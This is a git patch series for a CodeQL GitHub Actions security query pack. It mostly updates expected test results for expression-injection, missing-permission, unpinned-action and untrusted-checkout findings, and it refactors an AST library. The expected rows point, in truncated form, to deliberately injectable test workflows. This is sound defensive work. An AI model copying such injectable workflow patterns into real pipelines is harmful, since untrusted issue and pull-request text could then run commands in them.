.github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... 
iles }} | .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... 
iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... 
test }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | | .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... 
ody }}' | | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | | .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | 
@@ -68,17 +68,17 @@ nodes | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... 
alue }} | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | @@ -89,9 +89,9 @@ nodes | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | semmle.label | Job outputs node [matrix] | | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | semmle.label | Uses Step: set-matrix | | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | | .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | 
@@ -130,20 +130,20 @@ nodes | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | | .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... 
sage }} | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | 
@@ -158,7 +158,7 @@ nodes subpaths #select | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | 
@@ -176,13 +176,13 @@ subpaths | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. 
| | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. 
| | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | 
@@ -220,7 +220,7 @@ subpaths | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... 
age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected index 174f9d49e875..c26769a692e9 100644 --- a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected +++ b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected @@ -1 +1 @@ -| .github/workflows/missing_perms.yml:6:5:9:32 | name: Build and test | Actions Job or Workflow does not set permissions | +| .github/workflows/missing_perms.yml:6:5:9:32 | Job: build | Actions Job or Workflow does not set permissions | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 169d9c9ac2b1..6620d2ac3852 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -1,7 +1,7 @@ -| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | -| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | -| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | -| .github/workflows/unpinned_tags.yml:10:7:11:4 | uses: foo/bar@v1 | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | uses: foo/bar@v1 | uses: foo/bar@v1 | -| .github/workflows/untrusted_checkout.yml:18:7:22:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:18:7:22:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | -| .github/workflows/untrusted_checkout.yml:22:7:25:21 | uses: f ... 
n-pr@v1 | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:22:7:25:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | +| .github/workflows/untrusted_checkout.yml:18:7:22:4 | Uses Step | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:18:7:22:4 | Uses Step | Uses Step | +| .github/workflows/untrusted_checkout.yml:22:7:25:21 | Uses Step | Unpinned 3rd 
party Action 'untrusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:22:7:25:21 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index 76d47eec1912..7527a1e15f2c 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -1 +1 @@ -| .github/workflows/untrusted_checkout.yml:9:7:13:4 | uses: a ... kout@v2 | Potential unsafe checkout of untrusted pull request on 'pull_request_target'. | +| .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on 'pull_request_target'. | From 6875640c6439aa6c4faa17f20af2ac43262cacfe Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Mar 2024 10:33:26 +0100 Subject: [PATCH 084/707] Refactor getXXXExpr methods --- ql/lib/codeql/actions/Ast.qll | 54 +++++++++-------- .../actions/controlflow/internal/Cfg.qll | 2 +- .../{inter-job.yml => inter-job0.yml} | 9 ++- .../CWE-094/.github/workflows/inter-job1.yml | 43 +++++++++++++ .../CWE-094/.github/workflows/inter-job2.yml | 45 ++++++++++++++ .../CWE-094/.github/workflows/inter-job4.yml | 44 ++++++++++++++ .../CWE-094/.github/workflows/inter-job5.yml | 45 ++++++++++++++ .../CriticalExpressionInjection.expected | 55 +++++++++++++---- .../CWE-094/ExpressionInjection.expected | 60 +++++++++++++++---- 9 files changed, 307 insertions(+), 50 deletions(-) rename ql/test/query-tests/Security/CWE-094/.github/workflows/{inter-job.yml => inter-job0.yml} (85%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 096f3b9f8033..89afd954d85c 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -214,19 +214,20 @@ class Strategy extends AstNode instanceof YamlMapping { /** * Gets a specific matric expression (YamlMapping) by name. */ - StringLiteral getMatrixVariable(string name) { + StringLiteral getMatrixVar(string name) { super.lookup("matrix").(YamlMapping).lookup(name) = result } - string getAMatrixVariableName() { - this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) - } + /** + * Gets a specific matric expression (YamlMapping) by name. + */ + StringLiteral getAMatrixVar() { super.lookup("matrix").(YamlMapping).lookup(_) = result } } /** * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ -class Needs extends AstNode { +class Needs extends AstNode instanceof YamlMappingLikeNode { Job job; Needs() { job.(YamlMapping).lookup("needs") = this } @@ -234,16 +235,18 @@ class Needs extends AstNode { Job getJob() { result = job } Job getANeededJob() { - if this instanceof YamlString - then - result.getId() = this.(YamlString).getValue() and - result.getLocation().getFile() = job.getLocation().getFile() - else - if this instanceof YamlSequence - then - result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and - result.getLocation().getFile() = job.getLocation().getFile() - else none() + result.getId() = super.getNode(_).(YamlString).getValue() and + result.getLocation().getFile() = job.getLocation().getFile() + // if this instanceof YamlString + // then + // result.getId() = this.(YamlString).getValue() and + // result.getLocation().getFile() = 